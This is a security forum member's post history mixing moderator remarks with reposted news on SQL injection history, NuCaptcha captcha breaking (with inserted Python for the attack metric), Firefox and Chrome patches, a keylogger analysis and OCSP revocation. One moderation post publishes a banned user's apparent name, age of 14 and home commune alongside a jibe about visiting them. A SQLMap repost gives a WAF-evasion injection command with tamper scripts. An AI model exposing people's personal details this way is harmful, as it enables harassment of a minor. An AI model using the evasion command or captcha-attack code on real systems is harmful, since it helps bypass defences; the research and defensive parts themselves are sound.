Posts: 18725
Days Won: 706
Everything posted by Nytro
-
Google offers one million dollars to hackers who break the Chrome browser
Nytro replied to seriks's topic in Security news
Those of you with the crash, let me see, how do you crash Chrome? Write an HTML page or some JavaScript code that crashes Chrome...
-
Google offers one million dollars to hackers who break the Chrome browser
Nytro replied to seriks's topic in Security news
And supposedly the European Parliament wants to stop these "attacks" in order to PROTECT PROGRAMMERS' RIGHTS, when they are offering a pile of money precisely to "violate" that right. Screw the MPs everywhere. The chances of anyone pulling something off are very small. Only the VUPEN guys managed it, and those are truly "solid" people, people who earn those 60,000 dollars quickly and who might not even bother to travel for that sum.
-
The ban won't be lifted no matter how many of your messenger "friends" throw a fit. The moderators won't lift the ban, because otherwise they'd be left without a moderator. And you get banned too: multiple accounts are forbidden, and I'm sick of this fuss. If anyone else decides to comment, they're next on the ban list. If you don't like it, throw a fit.
-
I don't know who you are or why you posted here; I wasn't going to ban you, but it's RST, not RTS, so "Goodbye".
-
EFF to European Parliament: Protect Coders’ Rights
Nytro replied to Fi8sVrs's topic in Security news
Screw the European Parliament. When I think of Romania and the kind of MPs it has, any words are useless... These people are dumb as rocks. Basically "programmers" don't want these stupid laws; they are NOT for their benefit, it's yet another attempt at mass control.
-
ID: mafteiliviu14, so his name is Mafei Liviu and he's 14 (I'm a genius, I know) and he's from Neamt, Urecheni commune. Why don't people from Bucharest pull crap like this, so we could show up at their place?
-
Thanks. I recommend it to everyone who has a high opinion of themselves; it's the perfect demonstration of what hacking means. PS: If you want the (printed) book, buy me a beer and I'll lend it to you.
-
There's no need for them to post, I just want them to read, and to realize that 13 years after this phenomenon appeared, self-styled "hackers" have started showing up just because they assume they understand this technique. I'll post some interesting articles tonight, so people understand that on the SQLi front we are about 8 years behind...
-
I was downloading it too when I had nothing to do. Mirror: https://rstcenter.com/videos/Debugging/
-
On Christmas day, 1998, Phrack 54 was issued. Phrack[1] is a “Hacker magazine written by the community, for the community”. It is an excellent source of technical security information and in this particular edition, 54, there was an article entitled “NT Web Technology Vulnerabilities” written by rfp – or rain forest puppy. Amongst other things this article described a number of attacks that employed SQL injection, though at no point is this term used in the article. rfp discusses IDC and ASP applications running on Microsoft’s Internet Information Server feeding into SQL Server 6.5. This article is the first real public outing of SQL injection – it just wasn’t called SQL injection at that time. That would come later. Next of note was a security advisory published by Allaire[2] on February the 4th 1999, a little over a month after rfp’s article. The security bulletin discusses the threat posed by “Multiple SQL Statements in Dynamic Queries”.
Link: http://phrack.org/issues.html?issue=54&id=8#article
Read it, and don't forget it was written in 1998...
-
[h=1]Intel Joins LibreOffice[/h]
Thu, 2012-02-23 09:52 by Swapnil Bhartiya
The month of February is a month to remember for the LibreOffice project. They formally incorporated the foundation in Berlin, released 3.5 with major changes and now Intel is joining the foundation as a member. Intel will also make LibreOffice for Windows from SUSE available in the Intel AppUp center. Intel AppUp Center is an online repository designed for Intel processor-based devices. "I have been using LibreOffice from day one for presentations at conferences and for data analysis," said Dawn Foster, open source community lead, Intel. "Our engineers have worked with the LibreOffice codebase to optimise it for Intel hardware. Adding it to the AppUp Center is an obvious extension, and will provide an exciting feature for all Ultrabook users." "We are thrilled to add Intel to our existing roster of supporters", said Florian Effenberger, volunteer and TDF board member, "TDF is first and foremost a vendor neutral project committed to excellence in the office suite space, but we greatly value the support and advice we gain from organisations such as SUSE, Red Hat, Google, the Free Software Foundation (FSF) and Software in the Public Interest (SPI)." LibreOffice has put the open source office suite in direct competition with Microsoft's own offering. OpenOffice suffered stagnation and did not see any innovation or improvement for a long time.
Source: Intel Joins LibreOffice | Muktware
-
It's the time zone. GMT vs GMT+2. Nothing complicated...
-
Approved: https://rstcenter.com/forum/search.php?do=finduser&userid=51601&starteronly=1&contenttype=vBForum_Thread
-
You read the source code, understand what it does, compile it and run it with the appropriate parameters.
-
Banned. Don't let me catch you with this kind of crap around here again.
-
Update:
A look at ASLR in Android Ice Cream Sandwich 4.0
How we broke the NuCaptcha video scheme and what we propose to fix it
Mozilla Releases Firefox 10.0.2 for png Flaw
Keylogger poses as Facebook and Microsoft, steals login credentials
Direct Shellcode Execution via MS Office Macros with Metasploit
Hunting & Exploiting Directory Traversal
Ubuntu 12.04 LTS Gets HUD Interface
Trend Micro Releases HijackThis Source Code to sourceforge.net
Google Chrome update fixes high-severity vulnerabilities and patches Flash Player
Hacking / Exploiting / Cheating in Online Games
Many roads to IAT
Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021)
Exploiting CVE-2011-2140 another flash player vulnerability
[unix/Solaris] Physical/logical disk structure (system level)
RudraScript .. Run code in every language from inside Lua scripts.
When I have time I'll keep at it and post more, it's just that I haven't really had much time lately. Page: https://www.facebook.com/rstforum
-
[h=1]How we broke the NuCaptcha video scheme and what we propose to fix it[/h]
Feb 17, 2012 | Security | Elie | No comments
NuCaptcha is the first widely deployed video captcha scheme. Since Technology Review interviewed me about NuCaptcha in October 2010, I have been working on evaluating its security and usability. In this blog post, I will discuss how we are able to break the current version of NuCaptcha with >90% success and also discuss a possible approach to fix it. Our fix is based on a new design principle called tracking resistance. Intuitively, tracking resistance means you have objects that have the same properties as the real captcha, so the algorithm doesn’t know which object in the video it should track. When successfully implemented, tracking resistance makes video captchas secure against vision/machine learning attacks and more secure than standard text-based captchas. I have been working on NuCaptcha security with many people over the last year and a half, including Matthieu Martin, Shang Ping, Jonathan Aigrain, Mike Bailey and John Mitchell.
[h=2]Responsible disclosure[/h]
Before getting started, it is important to mention that this post is a responsible disclosure: I have been in contact with the CEO of NuCaptcha for a couple of months now and have shared with him the results of our research way ahead of time, so they had plenty of time to get ready for this post (you can read their answer here). I also want to emphasize that the goal of this post is not to demo another cool attack (even though the algorithm is pretty nifty). Rather, I want to start an open discussion on the viability of our tracking resistance principle and to allow everyone to contribute to making video captchas a viable alternative to more traditional captcha schemes.
[h=2]Feedback Welcome[/h]
While discussing ongoing research (that is, before a research paper is accepted or submitted) is unorthodox in the security community, the numerous interactions I’ve had with various companies over the last 3 years made me realize many people rely on research results to design captchas. In this context, it is our duty to provide them the best and most secure design guidelines possible. I strongly believe in the example set by the cryptography community, that the best security is achieved through an open process and not with secrecy or isolation. Accordingly, this post summarizes our understanding of video captcha security and the reasoning that leads us to believe that tracking resistance is the best principle to make video captchas secure. The most difficult part of this research turned out not to be breaking NuCaptcha, which I’ve known how to do since December 2010, but rather to come up with the right abstraction to explain why video captchas might offer better security than image captchas and to synthesize where the extra security comes from. With this in mind, let’s get started on how to break NuCaptchas before discussing how to make them secure.
[h=2]The NuCaptcha Scheme[/h]
There are currently two different versions of NuCaptcha: a ‘simple’ version and the ‘standard’ version. The simple version looks like this: The standard version looks like this: As visible in the screenshot, the standard version differs from the simple version by a text animation from right to left. The user is then asked to enter the last word in the input box in the standard version. This scheme has multiple levels of security: in its easiest version the letters of the last word are in red; in the hard version the letters are in black and more heavily distorted. According to the site documentation, NuCaptcha uses a reputation algorithm to decide which version you get. Under the hood, NuCaptchas are short video files that contain about 500 frames.
[h=2]Which version to evaluate?[/h]
Since our technique successfully breaks the simple and the standard version of NuCaptcha, I am going to stick with the standard version because I believe that motion is the key feature to create a secure video captcha. To keep things fair, we are also going to focus on breaking the hard version and not rely on any of the advantages provided by having the letters in red or having them less distorted.
[h=2]Background customization[/h]
NuCaptcha allows users to choose between various backgrounds to customize their captchas. However, as we showed at CCS last year (available here) in our paper on breaking and securing text captchas, removing the background is fairly easy with the right algorithm, so we are going to stick with the default one. Regardless of the background chosen, our attack still applies.
[h=2]Attack algorithm overview[/h]
Overall, breaking a NuCaptcha captcha is done by accomplishing the 5 phases depicted in the diagram below. The attack algorithm assumes NuCaptchas that have been converted into frames. This step can be trivially executed using off-the-shelf software, so we will not discuss it here. The pre-processing phase involves removing the background and binarizing the captcha in black and white so it is easier to process. The frame analysis phase is then used to find the objects in each frame that can potentially be the captcha. The cross-frame analysis phase combines the frame analysis results to isolate the set of frames where the actual captcha is present. The segmentation phase aims at separating the captcha letters. As we will see, there are a couple of ways to do this; having multiple distortions of the same captcha actually gives us an opportunity to be more efficient at segmentation than with a standard captcha. Finally, the recognition phase is used to recognize each letter individually using a machine learning algorithm.
[h=4]How does it compare to standard text-based captchas[/h]
Compared to breaking image-based captchas, attacking video captchas is both harder and easier. It is harder because motion tracking is necessary to isolate the frames that contain the actual captcha. It is easier because being able to analyze multiple copies of the same captcha can boost the accuracy of the segmentation phase. Since the pre-processing part and the recognition part are very well understood and use well-known techniques, I am going to skip them to keep this blog post shorter. If you are interested in the subject or need a refresher, please read my paper on attacking image-based captchas (available here).
[h=2]Finding the captcha[/h]
Before we can attempt to segment the captcha, we first need to find the frames in which it appears. We assume that each NuCaptcha has a different starting point in the animation, as we want our attack to be robust and not to rely on easily fixable features. Our first task is thus to isolate the frames that contain the captcha itself, and within these frames isolate the captcha from other words that appear. To achieve this we track and analyze the words moving in the captcha using image and motion tracking. Our captcha isolation technique works backward and is done in two steps: first we isolate the most interesting object in each frame (see next section), then we track these objects across multiple frames and keep the set of 50 frames that contain the overall most interesting object.
[h=2]Frame analysis: finding the most interesting object[/h]
We rely on two types of image analysis to isolate the most interesting object in each frame: a bounding box shape analysis, and an interest point (SIFT algorithm) density evaluation.
An example of a frame where the object bounding boxes (the yellow squares) and object interest points (purple crosses) are computed is visible on the screenshot below. Based on these features, we found two ways to select the most interesting object. First, we look at the bounding box shape ratio width/height. Because the captcha is 4 letters long, we use a heuristic that the bounding box must have a width/height ratio greater than 1. We then discard every bounding box that is above or below certain thresholds, as we roughly know what the expected ratio is after looking at a couple of captchas. Second, we look at the SIFT (Scale-invariant feature transform) interest point density by bounding box. As visible on the screenshot above, the captcha bounding box contains more interest points than the other boxes. This is explained by the fact that the captcha letters are rotated independently and therefore have more ‘edges/corners’ than straight letters. The fact that the letters are rotated also implies that for the real captcha the interest points are scattered all over the box. On the other boxes the interest points are mostly near the edges because the letters are straight. We aggregate these two observations (more points, more scattering) into a density metric D that will be used to select the most interesting object. The metric D is computed as follows:
D = Sum_i ( 1 / distance(p_i, box_center) )
where distance is the Euclidean distance and p_i is each interest point. Basically, D calculates a weighted sum of all the interest points, giving more weight to the interest points closer to the center of the box. Combining these two techniques allows us to isolate the most ‘interesting’ object in each frame, by removing the objects below or above the bounding box thresholds and picking the object for which D is the highest.
The result of this selection algorithm for our example frame is visible on the screenshot below (Den being the value of the metric D for the given box).
[h=2]Cross-frame analysis: finding the captcha[/h]
Being able to isolate interesting objects is not good enough because in some frames the captcha will not be present. To isolate the set of frames where the most interesting object is the real captcha, we use the features extracted during the frame analysis step to do a “cross-frame analysis.” Our cross-frame algorithm works by computing a sliding window over the density metric D on 50 frames. As visible on the screenshots below, where the D value of the window is represented by the red curve, there is a clear spike when the captcha is displayed. So all we have to do is keep the highest spike (which encompasses 50 frames) and discard the remaining frames.
[h=3]Segmenting the captcha[/h]
The previous step identified 50 frames containing the captcha, giving us 50 instances of the same captcha that are slightly different (each letter is being animated independently). Here is an example: We can exploit these multiple variations of the same captcha in three different ways to help segment the captcha into individual letters. First, we can try to find an instance where all the letters are disjoint, making the segmentation trivial with a clustering algorithm. While we did find some instances where this is the case, this is not a good approach as it is unreliable and can be patched very easily. The second approach is to try Decaptcha (our captcha tool) on every instance, and use a voting decision to select the most probable answer. Using this approach, Decaptcha gives an 83% success rate on NuCaptchas. Here is an example of some of the clusters we have on a given NuCaptcha. It can be seen that some of them are better segmented than others and therefore easier to recognize.
It is likely possible to improve the effectiveness of this approach by factoring the confidence of the classifier into the voting procedure, but since the results with simple voting were already good enough to prove NuCaptcha vulnerable, we ended up not pursuing this direction. A third approach, to get close to a 100% success rate, is to use motion tracking (optical flow) to segment the letters. This approach uses a two-step algorithm. First, we compute the interest points in each frame and then track them across frames. You can see an example of this step on the screenshot below. Second, we compute a distance matrix (using a RANSAC algorithm) to analyze which interest points move together, defined as their relative distance staying almost constant. Each group of points that moves together makes up a cluster that represents a letter. We can use these points to know where each letter starts and ends and to perform segmentation, which we show in the screenshots below. Since matching corresponding interest points between frames is never perfect, sometimes we have very good results and sometimes bad ones. However, since we track letter movements between pairs of frames (the frame and the frame + 5), we have a lot of candidates to choose from, and we only need one good match to be successful. This discrepancy between the quality of the matches is illustrated on the screenshot below: the left side depicts an example where the tracking has generated 6 clusters that are not very accurate. The example on the right shows a successful clustering based on the distance matrix data. Even though the E, A, and P are collapsed, we are able to almost perfectly separate them using the distance matrix.
[h=4]Synthesizing the problem[/h]
To summarize, animating the captcha allows the attacker to do a “differential” analysis that helps the attack be more efficient. On the other hand, not animating the captcha is equivalent to having a static (text-based) captcha and renders moot any security advantage of using a video captcha.
[h=2]Toward secure video captcha[/h]
So are video captchas worthless? No, but it requires a lot of out-of-the-box thinking for us to find a way out. It took us significantly longer to understand the root of the problem and how to solve it than to break the current NuCaptcha scheme. Once we have accepted the fact that the segmentation resistance of video captchas will be equivalent to or lower than that of a standard text-based captcha (as explained above), it becomes clear that the extra security provided by using a video captcha needs to come from somewhere else: we have to find a hard vision problem to rely upon. Trying to prevent the computer from finding moving objects using a ‘confusing/moving background’ is a lost cause. The computer vision field has devised very efficient algorithms (optical flow algorithms) that are likely to destroy any attempts in this direction. On the other hand, it seems possible to make the isolation of the correct moving object very difficult. What we need to do is to remove every discriminative feature (or invariants, as Jeff Yan calls them) that the attacker can use to tell apart decoy moving objects and the real captcha. For example, our attack relies on two discriminative features to isolate the captcha: the number of interest points and the shape of the bounding box. Both of these features can be nullified by adding (moving) decoys that exhibit the same properties.
[h=2]NuCaptcha Response[/h]
As I said in the introduction, we notified NuCaptcha on November 21st, 2011, informing them we had an attack against their current scheme, and iterated with them until December 15th, 2011. On February 7th we wrote this blog post and shared it with them. At this time, they provided us an official answer that you can read here. Their answer contains two main points regarding the attack.
First, on page one, they state that they have a harder version that adds more distortions and where the letters are more crowded. When scraping their API, we emulate the behavior of a real bot by aggressively timing our requests. While we believe we got the version that a standard attacker might get (which is already harder than the version displayed on site), we have not evaluated the hard version referenced in their response. With respect to the difficulty of their hard CAPTCHA, I don’t believe that these heavier distortions are an efficient defense because even if the letters are more crowded, it should not impact an optical flow algorithm used to separate the letters. Further, I believe the heavier distortions should not be an issue for the recognition phase, as it has been well known since 2005 that computers beat humans when it comes down to recognizing a single heavily distorted character.
The solution proposed by NuCaptcha. Image taken from their response.
Regarding their fix, they propose adding inter-frame manipulation (see screenshot above) which should mess up our optical flow analysis by throwing off our distance matrix. I won’t be able to characterize the effectiveness of this technique until they roll out their changes and I can test it. My guess is that it is somewhat less effective, based on the fact that in cryptography adding noise to prevent side-channel attacks has been known to be ineffective (the canonical example being the differential power analysis attack (DPA) by Paul Kocher), but again I will withhold judgement until we can test.
[h=2]Toward secure video captcha[/h]
It is likely that there are features other than the two we used that can be abused by an attacker to break tracking resistance. This is why, following the good practices pioneered by the cryptography community, we decided to ask for your help to find them. This post openly discusses what we already know about video captcha security. We hope this is the first step in an evaluation process dedicated to making video captcha tracking resistance a viable option. I will also discuss this attack in my upcoming RSA talk about captchas in February, so if you are around, I would be happy to discuss it.
Source: How we broke the NuCaptcha video scheme and what we propose to fix it @ From Information to Intelligence
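The frame-analysis metric D and the 50-frame sliding window from the post above, as an added worked example (not the post's or Decaptcha's code): the bounding boxes, interest points and per-frame D values are constructed, and the width/height thresholds and the 1 px distance floor are assumptions the post does not state.

```python
import math

# Constructed sample data (not from the post or from Decaptcha): bounding boxes
# as (x, y, width, height) and SIFT-style interest points as (x, y) pixels.
SAMPLE_BOXES = {
    "plain_word": (10, 40, 60, 30),   # straight letters: points only near the edges
    "logo":       (80, 10, 30, 60),   # taller than wide: removed by the shape filter
    "captcha":    (120, 40, 80, 30),  # rotated letters: points scattered over the box
}
SAMPLE_POINTS = [
    (11, 41), (69, 41), (11, 69), (69, 69),                  # plain_word
    (82, 12), (95, 40), (108, 68), (95, 20), (95, 60),       # logo
    (130, 45), (145, 60), (160, 50), (175, 65), (190, 45),   # captcha
    (155, 55), (165, 58),
]
# Width/height thresholds are assumptions; the post only says the ratio must exceed 1.
MIN_RATIO, MAX_RATIO = 1.5, 6.0
# Floor on the distance so a point at the exact center does not divide by zero (assumption).
MIN_DISTANCE = 1.0


def shape_ok(box):
    """Bounding-box shape filter: keep boxes whose width/height ratio fits a 4-letter word."""
    _, _, w, h = box
    return MIN_RATIO <= w / h <= MAX_RATIO


def density(box, points):
    """D = sum_i 1/distance(p_i, box_center) over the interest points inside the box."""
    x, y, w, h = box
    cx, cy = x + w / 2, y + h / 2
    d = 0.0
    for px, py in points:
        if x <= px <= x + w and y <= py <= y + h:
            d += 1.0 / max(math.hypot(px - cx, py - cy), MIN_DISTANCE)
    return d


def most_interesting_object(boxes, points):
    """Frame analysis: drop boxes failing the shape filter, then pick the highest D."""
    candidates = {name: density(box, points)
                  for name, box in boxes.items() if shape_ok(box)}
    if not candidates:
        return None, 0.0
    name = max(candidates, key=candidates.get)
    return name, candidates[name]


def best_window_start(frame_scores, window=50):
    """Cross-frame analysis: start index of the `window` frames with the largest summed D."""
    if len(frame_scores) < window:
        raise ValueError("need at least %d frames" % window)
    current = sum(frame_scores[:window])
    best, best_start = current, 0
    for i in range(window, len(frame_scores)):
        current += frame_scores[i] - frame_scores[i - window]
        if current > best:
            best, best_start = current, i - window + 1
    return best_start


# Constructed per-frame D values: the captcha word is on screen in frames 40..89.
SAMPLE_FRAME_D = [0.1] * 40 + [0.8] * 50 + [0.1] * 30


if __name__ == "__main__":
    name, d = most_interesting_object(SAMPLE_BOXES, SAMPLE_POINTS)
    print("most interesting object: %s (D=%.3f)" % (name, d))
    print("captcha frames start at:", best_window_start(SAMPLE_FRAME_D))
```

Seen from the defender's side, the two features this code keys on (point density and box shape) are exactly what the post says a decoy has to mimic for the scheme to be tracking resistant.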
-
[h=1]SQLMap Tamper Scripts[/h]
Web Application Firewalls have become the new security solution for several businesses. Many companies often ignore the actual vulnerabilities and merely rely on the firewall for protection. Regrettably, most, if not all, firewalls can be bypassed. In saying this, my post will demonstrate how to use some of SQLMap’s new features to bypass WAFs/IDSs. I have recently had the pleasure of working on a few tamper scripts for SQLMap, which can be found in the latest development version from the subversion repository:
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
The focus of the tamper scripts is to modify the request in a way that will evade the detection of the WAF (Web Application Firewall) rules. In some cases, you might need to combine a few tamper scripts together in order to fool the WAF. For a complete list of the tamper scripts, you can refer to https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/ The first scripts I’ll demonstrate are space2hash.py and space2morehash.py, which work with MySQL (still haven’t gotten around to the MSSQL one). These scripts will convert all spaces to block comments with random text. The extended version of the script (space2morehash.py) will also add the comments in between certain function names and the parentheses. To get started using the tamper scripts, you use the --tamper switch followed by the script name. In my example I’m using the following command:
./sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
Figure 1: space2morehash.py tamper script in action via websec.ca
Read this whole blog, tamper scripts win.
Source: SQLMap Tamper Scripts Security Aegis
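A defender-side counterpart to the space2hash idea above, added here and not part of sqlmap or the original post: a rule set that matches keywords on the raw parameter misses spaces that were replaced by /*...*/ comments, while the same rule set applied after comment normalization does not. The signatures and request values are constructed, and MySQL's executable /*!...*/ version comments are kept rather than dropped; normalization only narrows the gap, the application-side fix remains parameterized queries.

```python
import re

# Ordinary block comment, e.g. the /*random text*/ that space2hash emits instead of a space.
BLOCK_COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)
# MySQL executes the body of /*!...*/ (optionally prefixed by a version number),
# so the body is kept as SQL text instead of being thrown away.
VERSION_COMMENT_RE = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.DOTALL)
WHITESPACE_RE = re.compile(r"\s+")


def normalize(value):
    """Canonical form of a parameter value before signature matching."""
    value = VERSION_COMMENT_RE.sub(r" \1 ", value)  # keep executable body
    value = BLOCK_COMMENT_RE.sub(" ", value)         # comment behaves as the space it replaced
    return WHITESPACE_RE.sub(" ", value).strip().lower()


# Constructed signatures, deliberately tiny; they depend on whitespace between
# keywords, which is exactly what the tamper scripts remove.
SIGNATURES = [
    re.compile(r"\bunion\b\s+(all\s+)?select\b", re.IGNORECASE),
    re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.IGNORECASE),
]


def naive_match(value):
    """Rule set applied to the request value as received."""
    return any(sig.search(value) for sig in SIGNATURES)


def normalized_match(value):
    """Same rule set applied after comment and whitespace normalization."""
    return naive_match(normalize(value))


# Constructed request parameter values in the shape a space2hash-style tamper
# would produce, with the outcome a correct filter should reach.
SAMPLES = {
    "1 UNION/*k9q2*/SELECT/*zz*/1,2": True,
    "1 UNION/*!50000 ALL*/ SELECT 1": True,
    "1/**/OR/*abc*/1=1": True,
    "42": False,
}


def evaluate():
    """Per sample: (hit on raw value, hit after normalization)."""
    return {v: (naive_match(v), normalized_match(v)) for v in SAMPLES}


if __name__ == "__main__":
    for value, (raw_hit, norm_hit) in evaluate().items():
        print("%-34s raw=%-5s normalized=%-5s expected=%s"
              % (value, raw_hit, norm_hit, SAMPLES[value]))
```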
-
[h=1]Google under fire over secretly tracking users[/h]
By John Blackstone
(CBS News) Some members of Congress are calling for an investigation of Google, after word came out that the company has been tracking iPhone users all over the Internet -- even users who thought they had blocked that kind of surveillance. CBS News correspondent John Blackstone spoke with the man who uncovered what Google was doing. Stanford University grad student Jonathan Meyer was doing research on Internet privacy when he discovered the computer code that let Google bypass user privacy settings. "The list just goes on and on," said Meyer. "If you went to these sites and thought you were there privately, you weren't?" asked Blackstone. "That's right," he said. Most iPhone and iPad users access the Internet through Apple's Safari browser, which automatically sets up a barrier to keep out tracking programs from third-party advertisers. Google found a way to secretly get through that barrier, letting the advertisers flow in and tracking information flow out. "The technology we were looking at involves taking what Google learned through organizing your information, and using that to enrich their advertising content on non-Google websites," said Meyer. Blackstone posed a question: "Google's slogan: 'Do no evil.' Is this evil?" "I think it raises questions about evil," said Meyer. "I hesitate to give a bright line response on the evil or not. I think if evil includes negligence and gross negligence, then this is evil." In a statement, Google insists the tracking codes it planted "do not collect personal information," and that it "didn't anticipate this would happen" when it made changes to improve access to Google features on Safari. Tracking users' online habits is the most valuable information Internet companies and advertisers can get. John Simpson, a consumer advocate, said user preferences and information are what Google is selling. "Don't think of yourself as Google's customer, you are Google's product," he said. Blackstone asked Meyer whether, when he goes online, he turns the privacy settings up full. "For sure," Meyer replied. "I think it's pretty absurd. You shouldn't need a Ph.D. in computer science to protect yourself." Meyer said his research at Stanford University shows that what we used to call spyware has now become standard business practice on the Internet. Also, Google said it has removed the code that created that privacy loophole.
Source: Google under fire over secretly tracking users - CBS News
-
[h=1]Mozilla Releases Firefox 10.0.2 for png Flaw[/h]
By Sean Michael Kerner | February 17, 2012
From the 'Be Careful What you Click' files: At the end of last week, Mozilla released Firefox 10.0.1, which fixed a single flaw. Now here we are at the end of a new week, and there is another release with Firefox 10.0.2. This time the flaw is one that I'm familiar with, as it was patched by Google in Chrome 17, just slightly ahead of the Firefox 10.0.2 update. The actual flaw is a vulnerability in the libpng graphics library that many open source tools (including browsers) use. It's an integer overflow flaw that could have some serious consequences. "An attacker could craft malicious images which exploit this bug, and deliver them to users through websites or email messages," Mozilla warned in its advisory. According to Mozilla, they were alerted about the flaw by Red Hat. In any event, make sure you update; this is a flaw that looks relatively easy to me to exploit and, thanks to the quick actions of Google and Mozilla, now trivially easy to protect against too.
Source: Mozilla Releases Firefox 10.0.2 for png Flaw - InternetNews
-
[h=2]Keylogger poses as Facebook and Microsoft, steals login credentials[/h]
By Dave Michmerhuizen & Luis Chapetti – Security Researchers
Most computer users have a haunting fear that somehow malware will find a way to sneak onto their PCs when they are not looking. The truth is that while this does sometimes happen, the most common types of malware rely on trickery to invade and infect your computer. An excellent example of this fell into our spam traps recently, a spam that pretended to be from Facebook (an easy thing to fake, actually) hiding its payload behind an official looking graphic from Microsoft. In this case the image is an HTML link supposedly offering up Microsoft Silverlight. If you take your time and examine the destination of that link you’ll see that the real payload is a .PIF file from an IP address in Malaysia. PIF files are Windows executable files, and in this case the executable that is actually sent is Trojan.Win32.Jorik. It can’t sneak onto your computer and install itself though; it needs your help to do that. Clicking on the Silverlight graphic does warn you that you’re about to run a program. This is why the Microsoft graphic is a clever addition to the ruse – you think you should be running a Microsoft program, and it’s doing exactly what you expect. The problem, of course, comes once you’ve pressed ‘Run’ and find out there is no Facebook or Silverlight, there is only malware. Trojan.Win32.Jorik is actually a keylogger. It begins monitoring your Web browsing, writing every keystroke and Web page title into a disk file. The keylogger can capture almost anything you do on the Web. This is of particular concern when visiting secure sites whose credentials you definitely want kept private, as demonstrated below:
Screenshot: Wells Fargo HTTPS login page
Screenshot: Facebook login page
Screenshot: Gmail HTTPS login page
We entered FakeUsername and FakePassword on all three sites. The results were easily found in the disk file that the keylogger maintains.
Screenshot: Keylogger file contents
Ultimately this disk file is sent back to a command and control server, hidden by no-ip.com and most likely also in Malaysia.
Screenshot: Network traffic to Command & Control
The bottom line, as we always say at Barracuda Labs, is to maintain a healthy skepticism about anything that appears in email. The easiest way into your computer is to persuade you to push that ‘run’ button. Spammers and malware distributors are constantly looking for ways to convince you to do just that. Be vigilant, don’t be a victim. Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat.
Source: Keylogger poses as Facebook and Microsoft, steals login credentials | The Barracuda Labs Internet Security Blog
-
The Differences Between Security Certifications

Friday, February 17, 2012
Contributed By: Joshua Lochner

I was involved recently in a conversation regarding, “What are worthwhile security-related certifications?” It seems like certifications have always been a source of contention for IT professionals. What are “The Right” certifications to get? Are they needed? Which ones would someone reap the most benefit from? Who cares?

The right certifications to pursue are going to vary from person to person, as to what would suit your interests and meet your goals best. Ask yourself some basic questions:

What interests me? For example… Are you a network administrator who wants to build up their credibility when proposing solutions to clients? Or are you a database administrator or UNIX or Windows system administrator who wants to expand their knowledge in their existing job role?

Do I want to remain in the same field or pursue a new path? What are your strong suits, and do you intend to build on those, or branch out in a new direction? Did you just change departments and want to establish a better understanding of the field you have moved into; if so, what certifications do your colleagues or would those above you respect?

What would lead to career growth? Would there be a certification that would provide benefit to your organization? Have you asked around to determine if any certifications are needed to fill roles in the organization; and if you get the certifications, would that role be something you might be interested in? Sometimes a simple certification can help to meet a business objective, or grow an internal process; and by helping the organization meet its objectives, the position filled may be higher up on the ladder than where you currently are.

Let’s run through a couple of questions on the Certs Diagram, and you’ll be on your way to figuring out whether a CCIE Security, a GIAC GCIH, or a GIAC GPEN would be the best cert for you to pursue next.
[Figure: Certs Diagram]

Bear in mind, the Certs Diagram is non-exhaustive; it is more to illustrate the point that there are lots of avenues to go down when approaching security certifications. That is why my company employs experts in five different practices to make a cohesive team. The benefits of pursuing information security certifications that align with one’s personal goals are reflected here.

Cross-posted from SecureState

Source: The Differences Between Security Certifications
-
Symantec: Stripping online certificate revocation checks from Chrome is misguided

Symantec says that Google and other browser vendors should help fix OCSP instead of giving up on it

By Lucian Constantin | IDG News Service

Stripping OCSP (Online Certificate Status Protocol) and CRL (certificate revocation list) checks from Google Chrome could have dangerous implications because it will turn Google into a single point of failure, according to security vendor Symantec.

When accessing a website over HTTPS (HTTP Secure), browsers check whether its SSL certificate has been revoked by the issuing certificate authority (CA). This is done by querying the CA's OCSP responder or by checking its published certificate revocation list.

For usability reasons, all major browsers currently ignore OCSP and CRL requests that result in network errors by default, in what is known as a soft-fail mechanism. However, some of them do offer users the option to enable hard-fail, which triggers errors for every request that goes unanswered.

On Feb. 5, Adam Langley, a security engineer at Google, announced that Chrome will stop performing OCSP and CRL checks in future versions. Instead, these checks are to be replaced with a locally cached list of revoked certificates that will be kept up to date by Google.

The reasons behind the decision are related to performance and security issues. OCSP and CRL requests increase page load times and are susceptible to blocking by man-in-the-middle attackers or captive portals, websites commonly used by Wi-Fi access points to prevent HTTP connections before users authenticate.

"This is a corner case that happens very infrequently. We argue that one shouldn't discard OCSP and CRLs because they don't work in a tiny fraction of cases," said Fran Rosch, vice president of Trust Services and SSL at Symantec, in a blog post on Thursday.

"His [Langley's] proposal to have the browser maintain a list of revoked certificates turns Google into a single point of failure, which Langley himself agrees is bad engineering practice," Rosch said.

According to Rosch, the soft-fail mechanism currently used by browsers is the real issue, since it allows HTTPS sessions to continue without establishing whether the SSL certificate is valid or not. Symantec has maintained an uptime of 100 percent for its OCSP and CRL services for the past ten years, so CA-level downtime shouldn't be a concern, he said.

"OCSP clearly does not work today because all major browsers operate it in soft-fail mode. That needs fixing," said Ivan Ristic, director of engineering at security firm Qualys, via email. "My view is that Google should have first made an effort to fix the problem," he said.

Qualys plans to start a project called "Global OCSP Responder monitoring" which will track the availability of all OCSP responders and identify CAs with unreliable ones. "That would hopefully enable everyone to switch to hard-fail by default," Ristic said.

According to Ristic, the performance issues could be resolved with the help of a technique known as OCSP stapling, which involves the owner of an SSL certificate querying the CA's OCSP server periodically and caching a signed response. This response would then be served to clients directly without them needing to open a connection to a separate host.

"Even without OCSP stapling, browsers can start to display a web site and perform the check in the background, so there's not going to be an immediate performance impact," Ristic said. "They could hard-fail after a second or two, possibly preventing further interactions with the site."

Removing OCSP checks from Google Chrome might even have legal implications for users, who won't be able to claim warranties for damages resulting from the use of bad certificates if the software they rely on doesn't make an effort to check certificate revocation status, said Eddy Nigg, founder and chief technology officer of certificate authority StartCom, via email.

"Strictly speaking, Google as a relying party and software vendor might not be able to make use of the CA root certificates its browser currently uses, due to non-compliance to those relying party obligations," Nigg said.

Nigg agreed that the problem is the soft-fail mechanism implemented in browsers, which he described as a failure in itself. "It's rather the browsers that have fairly weak implementations at their side and don't try hard enough (and smart enough) in order to obtain a status response," he said.

